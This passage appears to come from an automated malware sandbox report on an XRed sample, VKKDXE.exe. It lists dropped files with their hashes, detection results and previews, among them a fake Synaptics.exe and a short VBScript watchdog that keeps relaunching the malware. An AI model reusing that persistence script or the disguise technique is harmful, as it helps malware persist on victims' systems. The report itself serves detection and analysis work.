Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="653960" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WERCA01.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Mon Dec 30 12:18:19 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	1775882
Entropy (8bit):	2.244470821519376
Encrypted:	false
SSDEEP:	12288:eTRAHyB/GONDVjIOQfHdmvUGqmW0aKDGe0CniLS8P7qXS1hABhCwCEZ9K8L8+swT:eTRAHyaFsAYv
MD5:	7ACF268A7F8355B241DE18EE7650DBD4
SHA1:	E5EBFC22828BE4B415F98B5B571B1EC4EAE56CE1
SHA-256:	E93015A1ED7DE21A3DD32BDE2B11F9000C23A48B8783EFA8E88C05A38097D7C1
SHA-512:	CA4F76FC717CD1D1374762A38644E4827281FF7AA3ED1F08695B123E107569A2BF4382B3F106F9258F9440AC71B8B3EC5548A897C9D13533F1D4306CA6F6F83B
Malicious:	false
Preview:	MDMP..a..... .........rg.............%...............,......$....L.......b..............`.......8...........T...........`................L...........N..............................................................................eJ......HO......GenuineIntel............T.......D....xrg.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD4DF.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	6306
Entropy (8bit):	3.716664901621554
Encrypted:	false
SSDEEP:	192:R6l7wVeJXxz6gYiSoqfpDT89bgoOsf0/iem:R6lXJl6gYAqeXNfx
MD5:	A31D45E005D34CFB73347C13CF9E7BE0
SHA1:	19532CB9E03D041AD22D831D9DE8C4CCDE99686B
SHA-256:	AC0D24030AEF0B96925FABC396E166D145E28E5AC26FC64782738FAF195D8BE5
SHA-512:	F9DFD4D5AEB8B41409717226C2E62C3046CE98775B0DB506649724ABC8130E19B4290187761F4BB0042EDE844FECCE6F28D6229B0223A793F24CD6E9B140DF46
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.4.9.2.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD50F.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4572
Entropy (8bit):	4.443069097834044
Encrypted:	false
SSDEEP:	48:cvIwWl8zsCJg77aI9fEWpW8VYFPYm8M4JFuFw++q847H6ZhQd:uIjfQI7dd7VQSJ7+pH6ZhQd
MD5:	5B15FD6D383D1B0340A68AF0BD5C20F9
SHA1:	6F26F3E6A039C4FC8632EBA5217E72D0C14275E9
SHA-256:	40E2C09BEACC93D8FB1AB474AC8ADB03410CC4962ABFBC1C390F5F533EA6A9D4
SHA-512:	547927596D7B2EB5F03C1094945CB241682635AAA0D4C47F8D04CC37A11C113DF7B875D9ED19A4C97A26157433C361708E15B0821D8CC1A24AA6C40416D78C74
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="653961" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Synaptics\RCX458E.tmp

Download File

Process:	C:\Users\user\Desktop\VKKDXE.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	771584
Entropy (8bit):	6.627300361046806
Encrypted:	false
SSDEEP:	12288:aMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9Irr:ansJ39LyjbJkQFMhmC+6GD9I
MD5:	9DA1B61462418FA0389F2FAA306F6C1E
SHA1:	07A25F0CE68DCF75E423486CAE62ED10609E52B1
SHA-256:	EB005F71853E78D3558F2E62E2EED329D9EF88001CD94143D8DFD0E0371667C0
SHA-512:	3C2B6C26DAA5CB356FF29DEB815C4D5DA081BADF6C35502928BC4BEF8C6D6C0F3EC370E2775E836E1D366B6B9F785E81300F12CF349E9932479B37E90472C1F4
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\RCX458E.tmp, Author: Joe Security Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\RCX458E.tmp, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B.....................&....................@.......................... ...................@..............................B...........................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

C:\ProgramData\Synaptics\Synaptics.exe

Download File

Process:	C:\Users\user\Desktop\VKKDXE.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1687552
Entropy (8bit):	7.433252569170028
Encrypted:	false
SSDEEP:	24576:snsJ39LyjbJkQFMhmC+6GD9ChloDX0XOf4f/mlhxQfnmrAL4bHpZlF:snsHyjtk2MYC5GD4hloJfY/mlT/rLL
MD5:	31BA582DDE7C48214DFC929A8C5D5662
SHA1:	39497422641176CB4B6F8828B43805CBD1258D53
SHA-256:	35F873A09D5330E0C8C0E0BDABAC9640E606AC7955B6E2082D9D1CA3D9880492
SHA-512:	1357FFA717079A422AC2510F010722EC464C1F595FBBA3A1DF847FF3370F30D5B6ADB393F846838C565DE7B669C6E0968236C6ED8CE079DA3281531373AA849E
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 92%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B..................... ....................@.......................... ...................@..............................B......0....................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...0...........................@..P....................................@..P........................................................................................................................................

C:\ProgramData\Synaptics\Synaptics.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\VKKDXE.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Local\Temp\1zOvwvy.ini

Download File

Process:	C:\ProgramData\Synaptics\Synaptics.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
Category:	dropped
Size (bytes):	1652
Entropy (8bit):	5.259482426993385
Encrypted:	false
SSDEEP:	24:GgsF+0xSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+i+pAZewRDK4mW
MD5:	7E9977D498739668779E01B715A7B77F
SHA1:	D98272B1CDE4CA6706F9F165C04B6344907DE882
SHA-256:	222306C1B67070FF7B8006A6176F832576591571871F460FEB5336210E18E0DD
SHA-512:	26525B337C042416E24963195ED5FBAF01AD13B0AFC790B0B8A9DA062C125F5AD898833D4CAAA00D116C54DF3E5F0A018DD86C6817D8FE0B48DC636E9897D0A4
Malicious:	false
Preview:	<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="gZiwMtCAxL5p2p7vnjX5VA">{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

C:\Users\user\AppData\Local\Temp\25M3Lta.ini

Download File

Process:	C:\ProgramData\Synaptics\Synaptics.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
Category:	dropped
Size (bytes):	1652
Entropy (8bit):	5.269827909709091
Encrypted:	false
SSDEEP:	24:GgsF+0wfJZSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+dJZ+pAZewRDK4mW
MD5:	F74E1FB6C21E2A19FDCE83BE41883F67
SHA1:	88C7F1F4CEDE1A63BDA5414BF9B34EF21B6FA691
SHA-256:	4635CA9B99B6A167E67C702D6055825A0164235E6DD5E7E5EEB3557EC1568A6E
SHA-512:	984E4F5922BCB270D63D7FE661B14E1F193E757F6EE784C4CC52B54D427DE956A86C2EA637F0A52FBE762A829795DCCB103F033E89F1150446414843D2302DC3
Malicious:	false
Preview:	<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="OXzxH4-Tep0LOBNCjEvI5w">{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

C:\Users\user\AppData\Local\Temp\2AXC6v1.ini

Download File

Process:	C:\ProgramData\Synaptics\Synaptics.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
Category:	dropped
Size (bytes):	1652
Entropy (8bit):	5.268251100495036
Encrypted:	false
SSDEEP:	24:GgsF+0pUDSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+YUD+pAZewRDK4mW
MD5:	6C4E9FC63A72CD88B9F3C69C48FF5E80
SHA1:	7D38F2DEB86564B8FB1B571B623B4BC254E80294
SHA-256:	E94E3EB116693C29C0685DA6127BAFB497E089FB93E034DCAC1DE6003AD11C5D
SHA-512:	F6A7D1A7EAC465E03820B4DDCC041DF4C10EFE21549B0B38DFADA042A753B52E0ECE8935CF2ACEFFE311D954128E93376D419DB5D0B04DE809839210AD21C224
Malicious:	false
Preview:	<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="_-yxRKacDZdf5K7EYEzZXA">{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

C:\Users\user\AppData\Local\Temp\5OGxlU4.ini

Download File

Process:	C:\ProgramData\Synaptics\Synaptics.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
Category:	dropped
Size (bytes):	1652
Entropy (8bit):	5.257515498949421
Encrypted:	false
SSDEEP:	24:GgsF+0MdSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+z+pAZewRDK4mW
MD5:	E889DC9BD6EDF7D87768FB96BDF259EB
SHA1:	B4AC8A2A1378995B89F97D985FDB116F01FA91CA
SHA-256:	4104100C6DA63738F9DDAF62A3CD85B09A0DE6EFAE4E8C68C2FBB2B23E3B14C3
SHA-512:	5320FCF619C9C6BEC6D68003B528DE9A4AB6539AFC317DAC206338629BE54D2064E56E2E756BD28E15764130B304AF3CB5383D1DEC00E57F9EED6BF22F71C7C1
Malicious:	false
Preview:	<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="NwBM_Zecc5d9wTZ-ZHydQw">{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

C:\Users\user\AppData\Local\Temp\6ptqPTX.ini

Download File

Process:	C:\ProgramData\Synaptics\Synaptics.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
Category:	dropped
Size (bytes):	1652
Entropy (8bit):	5.2700729000301525
Encrypted:	false
SSDEEP:	24:GgsF+0bSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+Q+pAZewRDK4mW
MD5:	D6C6FB8F276E7CB0B1DFF9EED9A33A67
SHA1:	4A734FA0ECF518B4887AD149B9033C6130463D41
SHA-256:	A501BC63638923936A8D5B48314FFC651CC7F69532D66F28F521051C6128BD93
SHA-512:	5872584744C0CB5C5C79166F58E34FF8B0095E2D84352209206A7F40B2E7C4057C5861B9E32AD1933597DFB9C1D028C70817655FD57B6C49D869CD8EEF07F487
Malicious:	false
Preview:	<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="3A-amqDj8fAVX4QO--pCWg">{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

C:\Users\user\AppData\Local\Temp\9nyPdOq.ini

Download File

Process:	C:\ProgramData\Synaptics\Synaptics.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
Category:	dropped
Size (bytes):	1652
Entropy (8bit):	5.259765557054554
Encrypted:	false
SSDEEP:	24:GgsF+0OwSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+Jw+pAZewRDK4mW
MD5:	71AD1884608B16B670FEE5DA079607E7
SHA1:	3E5CBFCE772731E3A8D68F39431C652691D8D2DA
SHA-256:	05AF51A566CA2D44D44399C84D0C80DEE82368FA8B5D9A7F0B479A914C7BDBF8
SHA-512:	4E52253E658004710D17C1BA9F9502077F907AC7ABB4FA7EE8F5A47C0AB55EA077A21E8E295D83ABCFE909B903E9299E43A1BF905FFE981BA963F26D06DA062C
Malicious:	false
Preview:	<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="y21BUsPDkE010B1gGox8HA">{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

C:\Users\user\AppData\Local\Temp\A1GzrYk.ini

Download File

Process:	C:\ProgramData\Synaptics\Synaptics.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
Category:	dropped
Size (bytes):	1652
Entropy (8bit):	5.261453052141699
Encrypted:	false
SSDEEP:	24:GgsF+0ySU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+F+pAZewRDK4mW
MD5:	AE34A4E4359DAD2BB7DDCF307D49BA0B
SHA1:	5788B2794921AA020D61FEC7730EC6D9862B5208
SHA-256:	43C1AE36D5195CF1C6A87E85D2746D9EBCE73794838F8BCD09CDC34652E2BB72
SHA-512:	2B501F705E0CADD0EAA17A11D245A944D234519BC2C905F6AF0F5A5E3A74336D25D454BE8BEC87DA104D65E5AD32C704D7909F5BD89584E455D34AED13A9BCDE
Malicious:	false
Preview:	<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="NzSoax_HxLMt3BFN_BnOpw">{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

C:\Users\user\AppData\Local\Temp\CXNFQD.vbs

Download File

Process:	C:\Users\user\Desktop\._cache_VKKDXE.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	841
Entropy (8bit):	5.374957358401693
Encrypted:	false
SSDEEP:	24:dF/UFCU/qaG2b6xI6C6x1xLxeQvJWAB/FVEMPENEZaVx5xCA:f/UF3t+G+7xLxe0WABNVIqZaVzgA
MD5:	D26868E04B3FE6D875AA4C4D73152613
SHA1:	510E59531F078F7F518413839A0DA7CF47E69C56
SHA-256:	9772F597D23F86273809D6A5FBC457E00F6C9F023A3B1DEBD57FB9311559948D
SHA-512:	D35850344D29406FD0CAEA58A85BAC78246AF2FB0D6FAB7588611E5465C775B6C58D8F43435A204B0568800F76D196B07E2AF9F16859CC180DBBDF465F0317A4
Malicious:	true
Yara Hits:	Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: C:\Users\user\AppData\Local\Temp\CXNFQD.vbs, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	On error resume next..Dim strComputer,strProcess,fileset..strProcess = "._cache_VKKDXE.exe"..fileset = """C:\Users\user\Desktop\._cache_VKKDXE.exe"""..strComputer = "." ..Dim objShell..Set objShell = CreateObject("WScript.Shell")..Dim fso..Set fso = CreateObject("Scripting.FileSystemObject")..while 1..IF isProcessRunning(strComputer,strProcess) THEN..ELSE..objShell.Run fileset..END IF..Wend..FUNCTION isProcessRunning(BYVAL strComputer,BYVAL strProcessName)..DIM objWMIService, strWMIQuery..strWMIQuery = "Select * from Win32_Process where name like '" & strProcessName & "'"..SET objWMIService = GETOBJECT("winmgmts:" _..& "{impersonationLevel=impersonate}!\\" _ ..& strComputer & "\root\cimv2") ...IF objWMIService.ExecQuery(strWMIQuery).Count > 0 THEN..isProcessRunning = TRUE..ELSE..isProcessRunning = FALSE..END IF..END FUNCTION

C:\Users\user\AppData\Local\Temp\GvyBYMn.ini

Download File

Process:	C:\ProgramData\Synaptics\Synaptics.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
Category:	dropped
Size (bytes):	1652
Entropy (8bit):	5.270308914723572
Encrypted:	false
SSDEEP:	24:GgsF+0woSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+to+pAZewRDK4mW
MD5:	DE5F70D257AAA335D116B585C44C95A6
SHA1:	F0BB5F4513DB4C5DC53A71DFF0F781C6041ECA75
SHA-256:	FC651DBCC51CC42CAFF4CF08F30291AF68DDAAA4825395E460FD557730E43FC1
SHA-512:	4564A73119B520027B9233EF38DC2CAC530BD4175C2F5EB0CC79859EA9EB3D5A7C7922E8203C7895CA6CB231B8D472B23C031662D22B9D5F3F5947ECC07D5484
Malicious:	false
Preview:	<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="RQy0KvcvSu5U5Bjz1QTjbA">{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

C:\Users\user\AppData\Local\Temp\HVDGyNB.ini

Download File

Process:	C:\ProgramData\Synaptics\Synaptics.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
Category:	dropped
Size (bytes):	1652
Entropy (8bit):	5.269448398958046
Encrypted:	false
SSDEEP:	24:GgsF+0BtSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK++t+pAZewRDK4mW
MD5:	3B55B4031AC82BE50562F7311901E17F
SHA1:	244302BE3FA2425434118C1AF981B71E83ADFC30
SHA-256:	C0523CF5B4ED15914FA3C9A2A50C9AA38D4FE632FD5EB487ECC355412E36772C
SHA-512:	46AE088A547D6AB67D92ED586992F7918CA2F814C4C5680E8E77B9A9ED2347CA27D5A7E81F03D4C870684FCDC77A060870BD723DB647F52F761BE95218A4C064
Malicious:	false
Preview:	<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="6TG7AdlPbXLyH_6yi2KRYw">{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

C:\Users\user\AppData\Local\Temp\ItWIzbI.ini

Download File

Process:	C:\ProgramData\Synaptics\Synaptics.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
Category:	dropped
Size (bytes):	1652
Entropy (8bit):	5.2644893750526025
Encrypted:	false
SSDEEP:	24:GgsF+0uTBsXSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+tg+pAZewRDK4mW
MD5:	E52E32D1B146FC7B7FFDF2484D730DDC
SHA1:	EC5E670A93B940047753CD492E14F6F3C6600A95
